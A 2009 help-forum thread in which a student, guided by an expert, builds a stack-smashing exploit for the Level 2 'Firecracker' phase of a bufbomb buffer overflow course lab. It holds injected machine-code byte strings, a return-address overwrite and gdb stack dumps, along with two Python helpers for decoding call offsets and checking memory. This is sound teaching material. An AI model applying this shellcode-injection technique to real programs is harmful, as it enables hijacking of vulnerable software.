Question

Buffer Overflow Bomb Phase 2

Asked by: purewin

I'm starting phase 2 but I'm a little confused on what I need to do for it. Do I need to write my own assembly code for this or merely reference some code in the program that's already written?

Level 2: Firecracker (30 pts)

A much more sophisticated form of buffer attack involves supplying a string that encodes actual machine instructions. The exploit string then overwrites the return pointer with the starting address of these instructions. When the calling function (in this case getbuf()) executes its ret instruction, the program will start executing the instructions on the stack rather than returning. With this form of attack, you can get the program to do almost anything. The code you place on the stack is called the exploit code. This style of attack is tricky, though, because you must get machine code onto the stack and set the return pointer to the start of this code.
Within the file bufbomb there is a function bang() having the following C code:

#include <stdio.h>
#include <stdlib.h>

extern int cookie;             /* the team's cookie; defined elsewhere in bufbomb (type assumed) */
extern void entry_check(int);  /* defined elsewhere in bufbomb */
extern void validate(int);     /* defined elsewhere in bufbomb */

int global_value = 0;
void bang(int val)
{
    entry_check(2); /* Make sure entered this function properly */
    if (global_value == cookie) {
        printf("Bang!: You set global_value to 0x%x\n", global_value);
        validate(2);
    }
    else
        printf("Misfire: global_value = 0x%x\n", global_value);
    exit(0);
}
Similar to Levels 0 and 1, your task is to get bufbomb to execute the code for bang() rather than returning to test. Before this, however, you must set global variable global_value to your team's cookie. Your exploit code should set global_value, push the address of bang() on the stack, and then execute a return instruction to cause a jump to the code for bang().
Some Advice:

You can use GDB to get the information you need to construct your exploit string. Set a breakpoint within getbuf() and run to this breakpoint. Determine parameters such as the address of global_value and the location of the buffer.
Determining the byte encoding of instruction sequences by hand is tedious and prone to errors. You can let tools do all of the work by writing an assembly code file containing the instructions and data you want to put on the stack. Assemble this file with gcc and disassemble it with objdump. You should be able to get the exact byte sequence that you will type at the prompt. (A brief example of how to do this is included at the end of this writeup.)
Keep in mind that your exploit string depends on your machine, your compiler, and even your team's cookie. Do all of your work on the machine cs367.vsnet.gmu.edu, and make sure you include the proper team name on the command line to bufbomb.
Our solution requires 16 bytes of exploit code. Fortunately, there is sufficient space on the stack, because we can overwrite the stored value of %ebp. This stack corruption will not cause any problems, since bang causes the program to exit directly.
Watch your use of address modes when writing assembly code. Note that movl $0x4, %eax moves the value 0x00000004 into register %eax; whereas movl 0x4, %eax moves the value at memory location 0x00000004 into %eax. Since that memory location is usually undefined, the second instruction will cause a segfault!
Do not attempt to use either a jmp or a call instruction to jump to the code for bang. These instructions use PC-relative addressing, which is very tricky to set up correctly. Instead, push an address on the stack and use the ret instruction.


Asked On: 2009-11-03 at 13:24:16, ID 24868943
Topics: Assembly Programming Language, C Programming Language
Participating Experts: 1
Points: 500
Comments: 47


Answers

 

by: Infinity08, posted on 2009-11-03 at 13:29:32, ID: 25733961

>> Do I need to write my own assembly code for this or merely reference some code in the program that's already written?

The idea is to make your own code part of the buffer used for overflowing. When you overwrite the return address, you make it jump to that code, and execute from there. So, the exploit string might be something like :

        <padding><return address><exploit code>

This is what the exploit code should do :

>> Your exploit code should set global_value, push the address of bang() on the stack, and then execute a return instruction to cause a jump to the code for bang().

 

by: purewin, posted on 2009-11-03 at 22:06:31, ID: 25736802

Right but do I need to write assembly code for this or just do the same thing I've been doing and use the bytes?

 

by: purewin, posted on 2009-11-03 at 22:21:02, ID: 25736870

Not sure how I would begin going about editing the global variable either. It says I need to change it before changing/calling bang() but if I modify the string before the call to bang then that call won't fall into the proper address... Do I still keep the call to bang() in the same place or do I need to add something before it?

 

by: purewin, posted on 2009-11-03 at 22:37:56, ID: 25736946

Okay, well, I'm pretty sure that the global variable is stored here:
0x08048ce2 <bang+18>:   mov    0x804a1c0,%eax

Do I just need to call bang() then use some exploit string to overwrite 0x0804a1c0?

 

by: Infinity08, posted on 2009-11-04 at 02:41:49, ID: 25738000

>> Right but do I need to write assembly code for this or just do the same thing I've been doing and use the bytes?

Both :)

The <exploit code> part of the string you have to enter will be assembled instructions. So, you'll have to write the assembly code for :

>> Your exploit code should set global_value, push the address of bang() on the stack, and then execute a return instruction to cause a jump to the code for bang().

then assemble it, and place the resulting bytes in your string.


>> Do I still keep the call to bang() in the same place or do I need to add something before it?

In your assembly code, you'll first have to set the global variable, and then call bang.

 

by: purewin, posted on 2009-11-04 at 18:45:50, ID: 25746325

Would this code do the required operations?

movl 0x5d5f53de,eax
call 0x08048cd0

0x5d5f53de is my cookie and  0x08048cd0 is the address for bang(). If this code will work how would I convert it all to bytes?

 

by: purewin, posted on 2009-11-04 at 18:54:52, ID: 25746364

Er, the movl code should be
movl 0x5d5f53de,0x08048a1c0

right?

 

by: purewin, posted on 2009-11-04 at 18:56:56, ID: 25746377

And if that code is correct, I'm unsure of how to convert the movl and call operations into byte code...

 

by: purewin, posted on 2009-11-04 at 18:57:53, ID: 25746385

Just posting the corrected code:

movl $0x5d5f53de, 0x804a1c0
call 0x08048cd0

 

by: purewin, posted on 2009-11-04 at 19:58:58, ID: 25746659

Not sure how to get the byte code for these. I think I figured out what movl and call are in bytes, but I don't see how to get the converted byte code for the address being called...

 

by: purewin, posted on 2009-11-04 at 20:45:48, ID: 25746842

I don't get how the byte sequence for call is generated. I know the instruction call is e8, but for example

8048e5d:       e8 6e fa ff ff          call   80488d0 <save_char>

I know e8 is call, but I don't get where 6e fa ff ff was generated. Any thoughts?

 

by: Infinity08, posted on 2009-11-04 at 23:34:46, ID: 25747401

>> Would this code do the required operations?

Let me quote two phrases from your assignment to answer your question :

>> Note that movl $0x4, %eax moves the value 0x00000004 into register %eax; whereas movl 0x4, %eax moves the value at memory location 0x00000004 into %eax. Since that memory location is usually undefined, the second instruction will cause a segfault!

>> Do not attempt to use either a jmp or a call instruction to jump to the code for bang. These instructions use PC-relative addressing, which is very tricky to set up correctly. Instead, push an address on the stack and use the ret instruction.


>> 8048e5d:       e8 6e fa ff ff          call   80488d0 <save_char>
>> 
>> i know e8 is call but I don't get where 6e fa ff ff was generated.

It's a relative offset (which is the reason you shouldn't be using call, even though I suggested it earlier) : 0xFFFFFA6E (negative value).
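
The relative offset above can be worked out rather than guessed. The Python below is an added example (not code from the thread or the lab): it decodes an E8 call from the disassembly line quoted above, shows that the displacement is measured from the end of the 5-byte instruction, and shows that the same bytes placed at another address (0xbfffb410 is a constructed stack address) land somewhere else, which is the point the assignment makes about PC-relative addressing.

```python
"""Decode/encode x86 'call rel32' (opcode E8) and parse an objdump line."""
import struct

CALL_REL32_OPCODE = 0xE8
CALL_REL32_LENGTH = 5  # one opcode byte plus a 4-byte signed displacement


def decode_call_rel32(insn_addr, insn_bytes):
    """Absolute target of an E8 call whose first byte sits at insn_addr.

    The displacement is a little-endian signed 32-bit value added to the
    address of the *next* instruction, i.e. insn_addr + 5.
    """
    if len(insn_bytes) != CALL_REL32_LENGTH or insn_bytes[0] != CALL_REL32_OPCODE:
        raise ValueError("not an E8 call rel32 instruction")
    (disp,) = struct.unpack("<i", insn_bytes[1:])  # '<i' = LE signed int32
    return (insn_addr + CALL_REL32_LENGTH + disp) & 0xFFFFFFFF


def encode_call_rel32(insn_addr, target):
    """Inverse of decode: the 5 bytes an assembler emits for a call at insn_addr."""
    disp = target - (insn_addr + CALL_REL32_LENGTH)
    return bytes([CALL_REL32_OPCODE]) + struct.pack("<i", disp)


def parse_objdump_line(line):
    """'8048e5d:  e8 6e fa ff ff   call 80488d0 <save_char>' -> (addr, bytes).

    Hex byte tokens follow the address; the first non-hex token is the mnemonic.
    """
    addr_text, rest = line.split(":", 1)
    hex_tokens = []
    for tok in rest.split():
        if len(tok) == 2 and all(c in "0123456789abcdef" for c in tok):
            hex_tokens.append(tok)
        else:
            break
    return int(addr_text, 16), bytes.fromhex("".join(hex_tokens))


if __name__ == "__main__":
    # The line quoted in the thread, as it appears in the objdump output.
    addr, code = parse_objdump_line(
        "8048e5d:       e8 6e fa ff ff          call   80488d0 <save_char>")
    print(hex(decode_call_rel32(addr, code)))        # 0x80488d0: 0x8048e62 - 0x592
    # The identical bytes copied to a (constructed) stack address reach a
    # different target, because the offset is relative to where they execute.
    print(hex(decode_call_rel32(0xBFFFB410, code)))  # 0xbfffae83
```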

 

by: purewin, posted on 2009-11-04 at 23:43:10, ID: 25747424

Right, I've moved on and am trying to do what it says: push the address of bang and then a return instruction. Should the flow of my exploit string be this

(filler string)  -> (set global variable) -> (push bang address) -> (return instruction)

And to do this I write the code in a separate program and then compile it and then objdump it and use the generated byte code it gives for my exploit string?

So this code
movl $0x5d5f53de, %0x0804a1c0
won't overwrite the necessary variable?

 

by: purewin, posted on 2009-11-04 at 23:56:48, ID: 25747470

I'm unsure about how I would go about making it execute my code. Would I keep my original buffer up to the return call in getbuf() and then use the converted byte code? But wouldn't that cause a segmentation fault? I don't understand how I would be able to execute all the needed instructions since the converted byte code is longer than 4 bytes.

 

by: Infinity08, posted on 2009-11-05 at 00:36:48, ID: 25747613

>> (filler string)  -> (set global variable) -> (push bang address) -> (return instruction)

You need to also include a jump address to overwrite the return value. That address should point to your own exploit code.


>> And to do this I write the code in a separate program and then compile it and then objdump it and use the generated byte code it gives for my exploit string?

For example, or just construct it yourself by looking at similar instructions.


>> I don't understand how I would be able to execute all the needed instructions since the converted byte code is longer than 4 bytes.

If you overwrite the return value (just like in phase one), and let it point to your exploit code, the program will happily start executing your exploit code.

 

by: purewin, posted on 2009-11-05 at 01:03:51, ID: 25747721

Looks like I shouldn't use a jump command...

>> Do not attempt to use either a jmp or a call instruction to jump to the code for bang. These instructions use PC-relative addressing, which is very tricky to set up correctly. Instead, push an address on the stack and use the ret instruction.

Or is this just saying don't use it after my exploit code has executed?

 

by: purewin, posted on 2009-11-05 at 01:13:52, ID: 25747767

I still don't really understand this. I keep my original exploit string that overflows up to the return call in getbuf and at that point I need to change the global variable and after that I need to push the address for bang() onto the stack and then execute a return instruction? Which would mean everything is taking place in getbuf() and then the return would call bang()?

 

by: Infinity08, posted on 2009-11-05 at 01:14:39, ID: 25747776

>> Or is this just saying don't use it after my exploit code has executed?

It is talking about the part where you jump to the bang function.

You'll need to "jump" twice :

1) once by overwriting the return address of the getbuf function call, to start executing your exploit code
2) once inside the exploit code by executing a ret instruction to start executing the bang function.

 

by: purewin, posted on 2009-11-05 at 01:21:38, ID: 25747808

Okay, it makes a little more sense, I think. At the return call in getbuf() I should jump to my exploit code, which would start after that jump, and then the return in my exploit code should call the bang() address that should be pushed into ebp?

 

by: purewin, posted on 2009-11-05 at 01:40:46, ID: 25747891

Also, for example, my
movl $0x5d5f53de, %0x0804a1c0
in bytes is
c7 05 c0 a1 04 08 de 53 5f 5d
which is two extra bytes; how do those fit in? Wouldn't they be broken up like this
a1c005c7 53de0804 5d5f

or would the extra bytes be interpreted as instructions and the addresses fall together correctly?

 

by: Infinity08, posted on 2009-11-05 at 01:47:49, ID: 25747922

>> At the return call in getbuf() I should jump to my exploit code which would start after that jump and then the return in my exploit code should call the bang() address that should be pushed into ebp?

That's it.

>> or would the extra bytes be interpreted as instructions and the addresses fall together correctly?

An instruction is identified by the first byte, and is then followed by its arguments (if any). The next instruction immediately follows it, and again starts with 1 byte to identify the instruction, followed by its arguments etc.

If you need padding between instructions, you can use the nop instruction.

 

by: purewin, posted on 2009-11-05 at 01:53:14, ID: 25747945

Okay, so say I want to use the movl instruction. It's defined by c7 as a byte; would I put something like
c7 nop nop nop c0 a1 04 08 de 53 5f 5d
I still have to find the byte for nop, but is that the general idea?

 

by: purewin, posted on 2009-11-05 at 02:19:18, ID: 25748054

I don't see how I would know what address to jump to once I reach the return instruction in getbuf(). Would I just jump to
0x08048f58 <getbuf+24>: nop
which is right after it and overwrite that with my code?

 

by: purewin, posted on 2009-11-05 at 02:24:31, ID: 25748087

Here is my code so far:

jmp 0x08048f58
movl $0x5d5f53de, 0x0804a1c0
movl 0x08048cd0, %ebp
ret

I jump to the address right after the return call, then I overflow that address and the next with the movl instructions, first setting 0x0804a1c0 (global variable) to my cookie 0x5d5f53de and then setting ebp equal to the address of bang(), and then issuing a ret instruction which reads the address at ebp and calls bang.

Look good?

 

by: purewin, posted on 2009-11-05 at 03:16:22, ID: 25748335

Hmmmm, I'm not so sure about how to do the first jump to my exploit code. I overwrite the bytes at the return address with my jump byte code and then just add in byte code for the rest of my code right after?

 

by: Infinity08, posted on 2009-11-05 at 03:57:19, ID: 25748548

>> would I put something like c7 nop nop nop c0 a1 04 08 de 53 5f 5d

No. The arguments immediately follow the opcode.

Ignore nops for now ... You probably won't need them.


>> I don't see how I would know what address to jump to once reaching the return instruction getbuf().

gdb can tell you at which address your exploit code starts ...


>> Hmmmm, I'm not so sure about how to do the first jump to my exploit code.

Simply overwrite the return address of getbuf on the stack with the address of your exploit code.


>> I overwrite the bytes at the return address with my jump byte code and then just add in byte code for the rest of my code right after?

If you don't overwrite the return address with a valid address, then when the code returns from getbuf, it will return to some invalid location, and likely crash. You need to provide a valid address - namely the address where your exploit code starts.

 

by: purewin, posted on 2009-11-05 at 04:26:01, ID: 25748693

The address I need to jump to would be 0xbfffb408 according to this, correct?

0x08048dd0 in Gets ()
(gdb) x/32xw $sp
0xbfffb3ec:     0x08048f51      0xbfffb3fc      0x00000000      0x0804a108
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048dd1 in Gets ()
(gdb) x/32xw $sp
0xbfffb3e8:     0xbfffb408      0x08048f51      0xbfffb3fc      0x00000000
0xbfffb3f8:     0x0804a108      0xbfffb434      0x00857ff4      0x00000003
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb)

 

by: purewin, posted on 2009-11-05 at 04:36:46, ID: 25748759

34 b4 ff bf f4 7f 85 00 03 00 00 00 28 b4 ff bf c7 05 c0 a1 48 80 de 53 5f 5d 68 d0 8c 04 08 c3
This is my current exploit string; the address I need to call would go before c7, correct?

Is the address I'm looking for in getbuf() or Gets()?

 

by: purewin, posted on 2009-11-05 at 05:06:35, ID: 25748964

I feel like this exploit string should work...
34 b4 ff bf f4 7f 85 00 03 00 00 00 28 b4 ff bf 0c b4 ff bf c7 05 c0 a1 48 80 de 53 5f 5d 68 d0 8c 04 08 c3 fc b3 ff bf
But it keeps saying illegal instruction...

 

by: purewin, posted on 2009-11-05 at 05:18:04, ID: 25749056

I know my code is stored at the address 0xbfffb3fc but I can't get my string to work....

Breakpoint 1, 0x08048f4c in getbuf ()
(gdb) si
0x08048dd0 in Gets ()
(gdb) x/32x 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048dd1 in Gets ()
(gdb) si
0x08048dd3 in Gets ()
(gdb) x/32x 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) c
Continuing.

Breakpoint 2, 0x08048f57 in getbuf ()
(gdb) x/32x 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0xbfffb40c      0xa1c005c7      0x53de8048      0xd0685d5f
0xbfffb41c:     0xc308048c      0xbfffb3fc      0xdead00e9      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb)

 

by: Infinity08, posted on 2009-11-05 at 08:03:10, ID: 25750864

>> But it keeps saying illegal instruction...

Use gdb to see what happens. Check whether it jumps correctly to the start of your exploit code, and if so, where it starts going wrong.
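
The x/32x dump in the previous post is where the earlier "extra bytes" confusion comes from: gdb prints each 4-byte word as one little-endian number, so the bytes c7 05 c0 a1 read back as 0xa1c005c7. The Python below is an added example (not from the thread) that flattens such a dump back into bytes, reports where a given byte sequence landed, and compares memory against the bytes that were meant to be typed; on the sample dump (the three lines from the post above, embedded as constructed input) it reports the first mismatch at 0xbfffb414, where memory holds 48 80 and the intended encoding of 0x804a1c0 has 04 08.

```python
"""Flatten a gdb 'x/Nxw' dump to bytes and diff it against intended bytes."""
import struct

# Constructed sample: the first three lines of the x/32x 0xbfffb3fc dump
# taken at the getbuf breakpoint in the post above.
GDB_DUMP = """\
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0xbfffb40c      0xa1c005c7      0x53de8048      0xd0685d5f
0xbfffb41c:     0xc308048c      0xbfffb3fc      0xdead00e9      0xbfffe9f8
"""

# Constructed: the bytes the poster meant to place after the padding
# (movl $0x5d5f53de,0x804a1c0 / push $0x8048cd0 / ret).
INTENDED = bytes.fromhex("c7 05 c0 a1 04 08 de 53 5f 5d 68 d0 8c 04 08 c3")


def parse_gdb_words(dump):
    """Turn 'x/Nxw' output into (base_address, flat byte image).

    Each printed word is a little-endian value, so 0xa1c005c7 stands for the
    bytes c7 05 c0 a1 in ascending address order.
    """
    base = None
    next_addr = None
    image = bytearray()
    for line in dump.splitlines():
        if not line.strip():
            continue
        addr_text, word_text = line.split(":", 1)
        addr = int(addr_text, 16)
        if base is None:
            base = addr
        elif addr != next_addr:
            raise ValueError("dump lines are not contiguous at %#x" % addr)
        words = [int(w, 16) for w in word_text.split()]
        for w in words:
            image += struct.pack("<I", w)  # word value -> 4 little-endian bytes
        next_addr = addr + 4 * len(words)
    return base, bytes(image)


def locate(image, base, pattern):
    """Address at which pattern first occurs in the image, or None."""
    idx = image.find(pattern)
    return None if idx < 0 else base + idx


def first_mismatch(image, base, start_addr, intended):
    """Compare intended bytes with the image starting at start_addr.

    Returns None when every byte matches, otherwise
    (address, byte_found, byte_intended) for the first difference.
    """
    off = start_addr - base
    for i, want in enumerate(intended):
        got = image[off + i]
        if got != want:
            return (start_addr + i, got, want)
    return None


if __name__ == "__main__":
    base, image = parse_gdb_words(GDB_DUMP)
    start = locate(image, base, INTENDED[:4])  # where 'c7 05 c0 a1' landed
    print("code bytes start at %#x" % start)   # 0xbfffb410
    print(first_mismatch(image, base, start, INTENDED))  # (0xbfffb414, 0x48, 0x04)
```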

 

by: purewin, posted on 2009-11-05 at 12:55:04, ID: 25753903

I can't seem to figure out what I'm doing wrong. I've stepped through the code but nothing is jumping out at me...any hints to point me in the right direction?

 

by: purewin, posted on 2009-11-05 at 13:02:26, ID: 25753990

If anything, it looks like my code isn't falling together properly at 0xbfffb3fc? Is that causing the illegal instruction?

(gdb) x/32xw $ebp
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb468:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb478:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32xw ($ebp+8)
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb470:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb480:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048dd3 in Gets ()
(gdb) x/32xw $ebp
0xbfffb3e8:     0xbfffb408      0x08048f51      0xbfffb3fc      0x00000000
0xbfffb3f8:     0x0804a108      0xbfffb434      0x00857ff4      0x00000003
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32xw ($ebp+8)
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0xbfffb434
0xbfffb400:     0x00857ff4      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32w 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048dd4 in Gets ()
(gdb) x/32w 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) c
Continuing. 
Breakpoint 2, 0x08048f57 in getbuf ()
(gdb) x/32w 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0xbfffb40c      0xa1c005c7      0x53de8048      0xd0685d5f
0xbfffb41c:     0xc308048c      0xffb3fce9      0xde00c7bf      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) 

by: purewin | Posted on 2009-11-05 at 19:34:06 | ID: 25756409

I don't see why this current string isn't working... I'm stepping through the code and I can't seem to find what I'm missing/doing wrong.
34 b4 ff bf f4 7f 85 00 03 00 00 00 28 b4 ff bf 0c b4 ff bf c7 05 c0 a1 04 08 de 53 5f 5d 68 d0 8c 04 08 c3 fc b3 ff bf
(padding)
34 b4 ff bf f4 7f 85 00 03 00 00 00 28 b4 ff bf 0c b4 ff bf

(set global to cookie)
c7 05 c0 a1 04 08 de 53 5f 5d

(push bang address)
 68 d0 8c 04 08

(ret to my exploit code)
c3 fc b3 ff bf

Also here is the code dump for Gets and getbuf

Dump of assembler code for function Gets:
0x08048dd0 <Gets+0>:    push   %ebp
0x08048dd1 <Gets+1>:    mov    %esp,%ebp
0x08048dd3 <Gets+3>:    push   %edi
0x08048dd4 <Gets+4>:    push   %esi
0x08048dd5 <Gets+5>:    push   %ebx
0x08048dd6 <Gets+6>:    sub    $0xc,%esp
0x08048dd9 <Gets+9>:    mov    0x804a1ac,%ebx
0x08048ddf <Gets+15>:   movl   $0x0,0x804a1c4
0x08048de9 <Gets+25>:   mov    0x8(%ebp),%esi
0x08048dec <Gets+28>:   test   %ebx,%ebx
0x08048dee <Gets+30>:   je     0x8048e62 <Gets+146>
0x08048df0 <Gets+32>:   mov    $0x1,%edi
0x08048df5 <Gets+37>:   movl   $0x0,0xfffffff0(%ebp)
0x08048dfc <Gets+44>:   lea    0x0(%esi),%esi
0x08048e00 <Gets+48>:   mov    0x804a1a0,%eax
0x08048e05 <Gets+53>:   mov    %eax,(%esp)
0x08048e08 <Gets+56>:   call   0x80486b4 <_IO_getc@plt>
0x08048e0d <Gets+61>:   cmp    $0xffffffff,%eax
0x08048e10 <Gets+64>:   mov    %eax,%ebx
0x08048e12 <Gets+66>:   je     0x8048e74 <Gets+164>
0x08048e14 <Gets+68>:   cmp    $0xa,%eax
0x08048e17 <Gets+71>:   je     0x8048e74 <Gets+164>
0x08048e19 <Gets+73>:   call   0x80486c4 <__ctype_b_loc@plt>
0x08048e1e <Gets+78>:   mov    (%eax),%eax
0x08048e20 <Gets+80>:   testb  $0x10,0x1(%eax,%ebx,2)
0x08048e25 <Gets+85>:   je     0x8048e00 <Gets+48>
0x08048e27 <Gets+87>:   lea    0xffffffd0(%ebx),%eax
0x08048e2a <Gets+90>:   cmp    $0x9,%eax
0x08048e2d <Gets+93>:   mov    %eax,%edx
0x08048e2f <Gets+95>:   jbe    0x8048e40 <Gets+112>
0x08048e31 <Gets+97>:   lea    0xffffffbf(%ebx),%eax
0x08048e34 <Gets+100>:  cmp    $0x5,%eax
0x08048e37 <Gets+103>:  lea    0xffffffc9(%ebx),%edx
0x08048e3a <Gets+106>:  jbe    0x8048e40 <Gets+112>
0x08048e3c <Gets+108>:  lea    0xffffffa9(%ebx),%edx
0x08048e3f <Gets+111>:  nop    
0x08048e40 <Gets+112>:  test   %edi,%edi
0x08048e42 <Gets+114>:  je     0x8048e90 <Gets+192>
0x08048e44 <Gets+116>:  xor    %edi,%edi
0x08048e46 <Gets+118>:  mov    %edx,0xfffffff0(%ebp)
0x08048e49 <Gets+121>:  jmp    0x8048e00 <Gets+48>
0x08048e4b <Gets+123>:  nop    
0x08048e4c <Gets+124>:  lea    0x0(%esi),%esi
0x08048e50 <Gets+128>:  cmp    $0xa,%eax
0x08048e53 <Gets+131>:  je     0x8048e74 <Gets+164>
